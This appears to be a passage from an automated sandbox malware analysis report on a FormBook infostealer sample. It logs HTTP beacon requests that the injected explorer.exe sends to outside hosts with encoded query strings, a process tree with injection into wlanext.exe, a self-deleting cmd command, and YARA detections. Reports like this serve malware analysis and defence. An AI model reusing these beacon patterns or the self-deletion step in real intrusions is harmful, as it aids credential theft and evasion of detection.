                                                Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;dis


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.449859142.250.203.11580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Dec 2, 2021 20:00:51.645944118 CET5816OUTGET /mwev/?-Zf=wD7IX5djK39N0mXOoKckCLddnCt/+mP/xVLK1b09pQyAIyzBpLPKZ8m7O34kMZ4xQV6J&v0GTT=9rntXVQxPfS89pvp HTTP/1.1
                                                Host: www.experimentwithoutlimits.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Dec 2, 2021 20:00:51.680239916 CET5817INHTTP/1.1 302 Found
                                                Location: http://forcingfunction.com/workbook
                                                Date: Thu, 02 Dec 2021 19:00:51 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Server: ghs
                                                Content-Length: 232
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                Connection: close
                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 66 6f 72 63 69 6e 67 66 75 6e 63 74 69 6f 6e 2e 63 6f 6d 2f 77 6f 72 6b 62 6f 6f 6b 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://forcingfunction.com/workbook">here</A>.</BODY></HTML>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.449873198.143.147.5880C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Dec 2, 2021 20:00:57.042764902 CET5853OUTGET /mwev/?-Zf=IXYNpvQ1BiZ44tShy9SgvoX4c9kgPxO5K/+6kCom7tZxGdFtiZvct/5RRpjh/yF5dNln&v0GTT=9rntXVQxPfS89pvp HTTP/1.1
                                                Host: www.websitessample.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Dec 2, 2021 20:00:57.434561014 CET5858INHTTP/1.1 301 Moved Permanently
                                                Connection: close
                                                X-Powered-By: PHP/7.4.12
                                                Content-Type: text/html; charset=UTF-8
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://websitessample.com/mwev/?-Zf=IXYNpvQ1BiZ44tShy9SgvoX4c9kgPxO5K/+6kCom7tZxGdFtiZvct/5RRpjh/yF5dNln&v0GTT=9rntXVQxPfS89pvp
                                                Content-Length: 0
                                                Date: Thu, 02 Dec 2021 19:00:59 GMT
                                                Server: LiteSpeed


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                8192.168.2.449900107.164.242.4980C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Dec 2, 2021 20:01:02.664268970 CET5915OUTGET /mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv+wAuDzmHDYSO236DISOvOLkKOKiYq/4R&v0GTT=9rntXVQxPfS89pvp HTTP/1.1
                                                Host: www.foxandmew.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Dec 2, 2021 20:01:02.834745884 CET5918INHTTP/1.1 301 Moved Permanently
                                                Date: Thu, 02 Dec 2021 19:01:02 GMT
                                                Server: Apache/2
                                                Location: https://www.foxandmew.com/mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv+wAuDzmHDYSO236DISOvOLkKOKiYq/4R&v0GTT=9rntXVQxPfS89pvp
                                                Content-Length: 339
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 78 61 6e 64 6d 65 77 2e 63 6f 6d 2f 6d 77 65 76 2f 3f 2d 5a 66 3d 72 63 36 63 47 39 6c 65 52 72 75 54 78 2f 59 46 61 6d 43 63 7a 59 59 47 6d 65 36 66 48 64 76 4d 62 49 78 76 2b 77 41 75 44 7a 6d 48 44 59 53 4f 32 33 36 44 49 53 4f 76 4f 4c 6b 4b 4f 4b 69 59 71 2f 34 52 26 61 6d 70 3b 76 30 47 54 54 3d 39 72 6e 74 58 56 51 78 50 66 53 38 39 70 76 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.foxandmew.com/mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv+wAuDzmHDYSO236DISOvOLkKOKiYq/4R&amp;v0GTT=9rntXVQxPfS89pvp">here</a>.</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                9192.168.2.44990834.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Dec 2, 2021 20:01:07.891082048 CET5934OUTGET /mwev/?-Zf=IjrmxmCSNg9SW3Y0DfjHEVuIkvJ5tkiLJE48G3emnLXjviiyyOAbNkhdp+PdSxIUf+MM&v0GTT=9rntXVQxPfS89pvp HTTP/1.1
                                                Host: www.9linefarms.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Dec 2, 2021 20:01:08.006105900 CET5934INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 02 Dec 2021 19:01:07 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "618be761-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Code Manipulations

                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Start time:19:59:10
                                                Start date:02/12/2021
                                                Path:C:\Users\user\Desktop\1D4l9eR0W4.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\1D4l9eR0W4.exe"
                                                Imagebase:0xe80000
                                                File size:415744 bytes
                                                MD5 hash:192B796D92D190C45204571599C38C86
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.665105654.000000000333D000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:19:59:13
                                                Start date:02/12/2021
                                                Path:C:\Users\user\Desktop\1D4l9eR0W4.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\1D4l9eR0W4.exe
                                                Imagebase:0xdf0000
                                                File size:415744 bytes
                                                MD5 hash:192B796D92D190C45204571599C38C86
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:19:59:16
                                                Start date:02/12/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6fee60000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Start time:19:59:35
                                                Start date:02/12/2021
                                                Path:C:\Windows\SysWOW64\wlanext.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                Imagebase:0x910000
                                                File size:78848 bytes
                                                MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                General

                                                Start time:19:59:39
                                                Start date:02/12/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del "C:\Users\user\Desktop\1D4l9eR0W4.exe"
                                                Imagebase:0x11d0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:19:59:40
                                                Start date:02/12/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff724c50000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Code Analysis

                                                Reset < >